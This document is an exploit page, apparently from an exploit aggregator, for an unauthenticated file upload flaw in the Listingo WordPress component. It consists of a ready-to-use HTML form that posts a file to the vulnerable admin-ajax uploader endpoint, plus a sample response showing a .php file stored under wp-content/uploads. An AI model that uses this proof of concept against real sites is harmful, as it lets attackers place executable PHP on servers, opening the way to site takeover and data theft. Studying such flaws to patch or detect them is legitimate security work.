## https://sploitus.com/exploit?id=WPEX-ID:E39B59B0-F24F-4DE5-A21C-C4DE34C3A14F
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Listingo Unauthenticated File Upload</title>
</head>
<body>
<form action="https://example.com/wp-admin/admin-ajax.php?action=listingo_temp_uploader" method="post" enctype="multipart/form-data">
Upload a File:
<input type="file" name="listingo_uploader" id="listingo_uploader">
<input type="submit" name="submit" value="Start Upload">
</form>
</body>
</html>
The response gives the path to the uploaded file:
{"type":"success","url":"https:\/\/example.com\/wp-content\/uploads\/wp-custom-uploader\/1665086303.php","filename":"1665086303.php","message":"Image deleted."}